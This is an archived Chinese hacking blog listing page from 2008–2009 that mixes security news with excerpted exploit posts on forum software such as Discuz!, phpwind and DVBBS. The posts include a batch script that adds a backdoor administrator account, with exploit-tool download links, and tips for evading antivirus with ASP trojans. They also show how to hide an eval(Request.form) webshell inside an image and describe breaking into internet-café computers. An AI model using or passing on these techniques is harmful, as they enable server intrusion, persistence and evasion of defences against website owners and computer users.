http://www.bycnboy.com/cnboy/soft_cnboy/x-scan.html

[欢迎光临] ： 提示：如果你觉得音乐太吵闹，请你选择下面静音版浏览博客。
中国知音在线 http://Online.bycnboy.com

★→切换到: ∑静音版∈ ∮音乐版 ∮ ∈←
中国知音QQ:274088126 Msn:CnBoy99@Hotmail.com E-mail:lide8008@163.com

Tag: 漏洞预览模式: 普通 | 列表

[业界焦点] 美女黑客曝英特尔CPU漏洞或引发全球恐慌

作者:中国知音日期:2009-03-24

[业界焦点] 美女黑客曝英特尔CPU漏洞或引发全球恐慌

近日，波兰知名美女黑客Joanna Rutkowska成为安全业内焦点人物，她在博客上发表一篇论文，曝光了一个英特尔CPU的缓存漏洞。而另一位安全研究人员Loic Duflot将在加拿大温哥华举行的CanSecWest安全大会上介绍该漏洞和攻击代码。

　　如果这一漏洞被证实存在，黑客就可利用该漏洞获得对电脑近乎至高无上的控制权，并且不受任何操作系统控制、关闭或禁用。毋容置疑，此时杀毒软件将毫无用武之地。黑客的攻击范围，可能覆盖Vista、XP、Windows Server、Linux或BSD等任何一个装有英特尔CPU的操作系统，这无疑会给所有安装英特尔计CPU的用户带来极大恐慌。据悉，目前全球计算机系统中，英特尔CPU的市场份额占到85%以上。

美女黑客Joanna Rutkowska

　　庆幸的是，Joanna Rutkowska是一个被归为“灰帽黑客组织”的漏洞挖掘和研究人员，这类天才们往往以安全研究人员自居，他们常常把发现的漏洞曝光，或交给微软官方，从而推动软件厂商积极修补漏洞。

　　然而，如果这些高危漏洞被另一些属于“黑帽组织”的漏洞挖掘者发现的话，后果将会很糟糕。这类人一般会为了金钱而把挖掘到的漏洞卖到黑市，结果极有可能是漏洞落到商业黑客手中，从而引发网络疫情。。因此，在互联网黑色产业链条中，技术最高、威胁最大的从业者并非是木马作者，而是“黑帽组织”中的漏洞挖掘者。

　　360安全专家表示，目前互联网90%以上的网络威胁都是在利用用户机器内的漏洞，可以说漏洞是互联网目前的威胁之源。如果把计算机系统比作人体，修补漏洞就相当于注射抗病毒疫苗，而杀毒软件仅仅是外用药品，只能治病却不能提供免疫能力。因此，要从根本上保障电脑安全，就必须及时安装微软和第三方软件厂商提供的最新漏洞补丁。

　　360安全卫士作为国内最大的网络安全平台，不但能将必须的微软最新漏洞补丁第一时间发送到2亿用户电脑中，而且还能经常截获利用0Day漏洞（官方发现但尚未提供补丁的漏洞)的最新木马病毒，并为用户提供修复漏洞的临时补丁。如前不久微软IE7、GDI+等0day漏洞被曝光后，360都先于微软给用户提供了临时补丁，有效遏制了木马的大面积感染。

　　360安全专家表示，针对此次英特尔CPU可能存在的缓存漏洞，360安全中心将严密监测近期的网络疫情，并同时关注英特尔公司就此漏洞的官方回应。一旦英特尔方面证实该漏洞的存在并推出相应补丁，360安全卫士将在第一时间将该补丁推送到2亿用户的电脑桌面，提醒用户及时修复漏洞。

分类:[关注行业] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 662

[微软漏洞] 微软IE8正式发布前数小时被黑客成功入侵

作者:中国知音日期:2009-03-21

[微软漏洞] 微软IE8正式发布前数小时被黑客成功入侵

北京时间3月20日消息，据国外媒体报道，在微软正式发布IE8最终版几个小时之前，在PWN2OWN黑客大赛上，德国一安全研究人员在5分钟内成功黑掉了该浏览器，并因此赢取了5000美元奖金和一台索尼笔记本。

　　该安全研究人员是来自德国的一个计算机专业学生，通过利用此前一个未公布的IE8安全漏洞，他在数分钟之类入侵了这台安装Windows 7的索尼笔记本。

　　目前微软已经针对Windows XP、Vista、Server 2003和Server 2008推出了IE8最终版。但是，针对Windows 7的最终版本还没有发布。

　　不过，微软拒绝证实该安全漏洞的存在。微软一发言人表示，微软正在调查IE8是否真的存在该漏洞，一旦被证实，微软将采取措施来保护用户。

　　另外，该安全研究人员通过使用之前创建的攻击代码，还成功攻击了苹果的Safari和Mozilla的火狐浏览器，他在当天下午的全部收获为15000美元现金和一台索尼笔记本。

Tags: 微软微软漏洞漏洞 IE IE 系统漏洞系统漏洞

分类:[技术文章] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 683

[业界关注] MySpace创始人曾是黑客头目(图)

作者:中国知音日期:2008-09-05

[业界关注] MySpace创始人曾是黑客头目(图)

MySpace联合创始人汤姆·安德森(Tom Anderson)

MySpace创始人Chris DeWolfe和Tom Anderson(右)

　　北京时间9月1消息，据国外媒体报道，人们都知道汤姆·安德森(Tom Anderson)是MySpace联合创始人，但鲜为人知的是，他年少时曾是一个黑客组织的领袖。

　　1985年，安德森14岁时就曾成功入侵美国大通曼哈顿银行(以下简称“CMB”)的电脑系统。这些系统存储着客户的重要资料，安德森警告CMB，除非让他免费使用其系统，否则他将破坏这些数据。

分类:[关注行业] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1519

[最新漏洞] Google Chrome这么快就出了个漏洞

作者:中国知音日期:2008-09-05

[最新漏洞] Google Chrome这么快就出了个漏洞

谷歌Chrome浏览器推出还不到一天时间，互联网安全公司卡巴斯基安全专家赖安·纳瑞恩(Ryan Narraine)就从中发现一处安全漏洞。该漏洞存在于旧版WebKit引擎中，可导致用户执行恶意Java可执行文件。安全专家艾维·来福(Aviv Raff)最早于今年5月发现该漏洞，并公布了攻击代码。谷歌Chrome浏览器基于WebKit引擎，当下载来福公布的攻击代码时，Chrome并不会给出任何提示，这意味着黑客可以在用户计算机中执行任何Java程序。

　　Chrome的漏洞让谷歌在两个方面颜面尽失。首先，无论是在官方声明中，还是发布前的视频演示中，谷歌始终在强调Chrome的安全性。

其次，今年7月发布Safari 3.2.1时，苹果已经修复了WebKit该处漏洞。此时，距离该漏洞出现已经2个月。这意味着谷歌Chrome使用的是旧版WebKit引擎。

分类:[分享资源] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1132

[最新微软漏洞] NSLOOKup 存在0day漏洞+演示

作者:中国知音日期:2008-08-31

[最新微软漏洞] NSLOOKup 存在0day漏洞+演示

微软 NSLOOKup.exe 被报存在0 day 漏洞,攻击者主动应用该漏洞将引起主机拒绝服务或执行任意代码.微软表示正在调查此漏洞.
含技术演示.

访问: 漏洞演示 http://www.nullcode.com.ar/ncs/crash/nsloo.swf

分类:[技术讨论] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1101

[最新漏洞] Discuz!NT 2.5（20080826更新前）注入

作者:中国知音日期:2008-08-31

[最新漏洞] Discuz!NT 2.5（20080826更新前）注入

漏洞说明：Discuz!NT 2.5 是康盛创想(北京)科技有限公司旗下的一款功能强大的基于 ASP.net 平台的社区软件。基于先进的 .Net Framework，默认支持 SQLServer数据库，可扩展支持Access、MySQL等多种数据库，支持IIS5、IIS6、IIS7，安全高效、稳定易用，充分发挥 ASP.net 特性，支持自由选择切换皮肤，支持多种其它论坛的数据转换。
Discuz!NT 2.5 强化论坛功能，提高速度和稳定性，负载能力也有显著改善，在此基础上还将提供包括商品交易、空间、相册等强大功能的插件包，供用户自由选择安装，体现出强大的伸缩扩展性。无论是从功能、性能，还是从支持环境等角度来看，都是目前最为完善和成熟 ASP.net 社区软件。但是ISTO成员在其中发现了一个安全漏洞，成功利用此漏洞可以直接修改管理员的密码进入后台，取得管理员权限，从而控制整个网站。

漏洞厂商：http://www.comsenz.com

漏洞解析：在 Discuz!NT 2.5（20080826更新前）版本中showuser.aspx页面由于对ordertype变量没处理好！导致SQL注入，恶意攻击用户甚至不用注册账户，只要精心构造ordertype即可利用此漏洞。

分类:[技术讨论] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 981

[漏洞] phpwind 最新漏洞。

作者:中国知音日期:2008-06-13

[漏洞] phpwind 最新漏洞。

漏洞说明：phpwind是国内使用非常广泛的一款程序，由于在程序设计上存在错误，导致任何人可以取得前台管理员及斑主权限，做删除帖子等任意操作

利用方式：http://www.80sec.com有提供exploit

漏洞分析：由于phpwind论坛在设计上对数据库存储机制不了解，导致在程序逻辑上判断有问题，用精心构造的数据注册用户即可获得管理权限

漏洞修补：建议关闭注册功能等待官方出补丁

漏洞状态：08.5.25发现此漏洞，08.6.1由80sec.com公开此漏洞，暂无补丁

漏洞测试：

# -*- coding: gb2312 -*-
import urllib2,httplib,sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookies)

def banner():
     print ""
     print "########################################################"
     print "Phpwind所有版本管理权限泄露漏洞利用poc"
     print "Copyright (C) 2006"
     print "jian...@80sec.com"
     print "80sec是一个新的致力于web安全的小团体"
     print "http://www.80sec.com"

哪位大哥编译出来了记得发一份GuI EXP给我哈。。E-mail:lide8008@163.com

Tags: oday oday 漏洞漏洞

分类:[技术讨论] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 846

[Exp] PHPWind 5.x Oday!

作者:中国知音日期:2008-06-13

[Exp] PHPWind 5.x Oday!

| PHPWind 5.x Exploits |
| |
| Powered by HamFast V1.12 20070101 |
| |
\---------------------------------------------------------------/

ATTANTION: Only do this bug test on your board!//仅仅用来测试你的论坛安全！
Don't attack any other site!//不要用于攻击其他网站

Tags: oday oday 漏洞漏洞

分类:[技术讨论] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 735

[转载] 漏洞

作者:中国知音日期:2008-03-05

[转载] 漏洞

不想说什么了，能看懂的朋友自己看看，看不懂的朋友去问问。
过程中需要的osk.exe 内容是由下面的bat转换而来

net user IISDebugger "ccteam" /add
net localgroup administrators IISDebugger /add

演示地址:http://www.virhost.net/up_files/soft/imerdp.html
相关工具osk.exe 下载地址:http://www.virhost.net/up_files/soft/osk.exe.mdb
imerdp_win下载地址http://www.virhost.net/up_files/soft/imerdp_win.rar.mdb

win下的ImeRdp今天正式在邮件列表发布了！

Tags: 漏洞漏洞

分类:[技术讨论] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 988

[服务器安全] 防范php木马

作者:中国知音日期:2008-02-21

[服务器安全] 防范php木马

1、防止跳出web目录（严重采用）

　　首先修改httpd.conf，如果你只允许你的php脚本程序在web目录里操作，还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs，那么在httpd.conf里加上这么几行：

　　php_admin_value open_basedir /usr/local/apache/htdocs

　　这样，如果脚本要读取/usr/local/apache/htdocs以外的文件将不会被允许，如果错误显示打开的话会提示这样的错误：

分类:[分享资源] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 957

[渗透资料] 打造不死的ASP木马的方法

作者:中国知音日期:2008-02-21

[渗透资料] 打造不死的ASP木马的方法

想不到，前几天我才发现，我千辛万苦收集的ASP木马，居然没有几个不被Kill的。常说养马千日用马一时，可要是连马都养不好，用的时候可就头疼了。众多杀软中，查杀效果比较好厉害的就是瑞星跟NOD32（测试软件:瑞星2006、卡巴斯基反病毒6.0、Kv2006、 NOD32 AntiVirusv2.51.30和McAfee VirusScan v8.0i）。

来看一下几种比较常见的ASP木马免杀方法

1.加密法

常用的是用微软的源码加密工具screnc.exe，以此来躲开杀毒软件的追杀。优点是见效明显，一般的有害代码用此法加密后，可以存在于服务器上，发挥原有的功能.缺点是代码经过加密后，是不可识别字符，自己也不认识了。

Tags: 渗透渗透入侵入侵跨站跨站漏洞漏洞脚本脚本

分类:[技术讨论] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1165

[渗透资料] 站脚本执行漏洞详解

作者:中国知音日期:2008-02-21

[渗透资料] 站脚本执行漏洞详解

【前言】

本文主要介绍跨站脚本执行漏洞的成因，形式，危害，利用方式，隐藏技巧，解决方法和常
见问题（FAQ），由于目前介绍跨站脚本执行漏洞的资料还不是很多，而且一般也不是很详细
，所以希望本文能够比较详细的介绍该漏洞。由于时间仓促，水平有限，本文可能有不少错
误，希望大家不吝赐教。

声明，请不要利用本文介绍的任何内容，代码或方法进行破坏，否则一切后果自负！

【漏洞成因】
原因很简单，就是因为CGI程序没有对用户提交的变量中的HTML代码进行过滤或转换。

Tags: 渗透渗透入侵入侵跨站跨站漏洞漏洞脚本脚本

分类:[技术讨论] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 787

[黑客宝典] 推荐:让你变成ASP木马高手

作者:中国知音日期:2008-02-09

[黑客宝典] 推荐:让你变成ASP木马高手

1.名称：如何制作图片ASP木马（可显示图片）
建一个asp文件，内容为
找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为
了运行成功，还要搜索<%和％>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(#)+) </SCRIPT>

2. 名称：整蛊网吧
先用精锐网吧辅助工具得到用户名和密码，然后用计算机管理联结一台机器，开telnet,连接，开共享，

复制一个木马过去运行即可。

3．名称：感受MD5暴力破解的魅力

Tags: 漏洞漏洞网站漏洞网站漏洞黑客技术黑客技术

分类:[技术讨论] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1689

[漏洞收集] [漏洞收集] SQL版DVBBS后台拿webshell

作者:中国知音日期:2008-02-09

[漏洞收集] [漏洞收集] SQL版DVBBS后台拿webshell

前提是已经进入后台了，看admin/data.asp文件里恢复数据的部分代码
case "RestoreData" '恢复数据
admin_flag=",32,"
dim backpath
if not Dvbbs.master or instr(","&session("flag")&",",admin_flag)=0 then
Errmsg=ErrMsg + "<BR><li>本页面为管理员专用，请<a href=../admin_login.asp target=_top>登录</a>后进入。<br><li>您没有管理本页面的权限。"

Tags: 漏洞漏洞网站漏洞网站漏洞黑客技术黑客技术

分类:[技术文章] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 948

[漏洞收集] Discuz! 6.0.0漏洞

作者:中国知音日期:2008-02-09

[漏洞收集] Discuz! 6.0.0漏洞

____Discuz6.0__________injection __0day 可以直接注射,拿到后台密码。

// 允许程序在 register_globals = off 的环境下工作
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');

if ($onoff != 1) {

Tags: 漏洞漏洞网站漏洞网站漏洞黑客技术黑客技术

分类:[技术讨论] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3633

[漏洞收集] 良精企业网站管理系统漏洞

作者:中国知音日期:2008-02-09

[漏洞收集] 良精企业网站管理系统漏洞

良精企业网站管理系统Sql注入漏洞
Author:Tr4c3[at]126[dot]com
http://www.nspcn.org
http://www.tr4c3.com
涉及版本：良精企业网站管理系统(2007-V09)官方正式商业版
其他版本未做测试

漏洞文件：
EnProductShow.asp

漏洞描述：
变量ID信任客户端提交值，带入sql语句查询，程序用了通用SQL防注入程序，详细见Check_Sql.asp。关键代码如下

Tags: 漏洞漏洞网站漏洞网站漏洞黑客技术黑客技术

分类:[技术讨论] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1929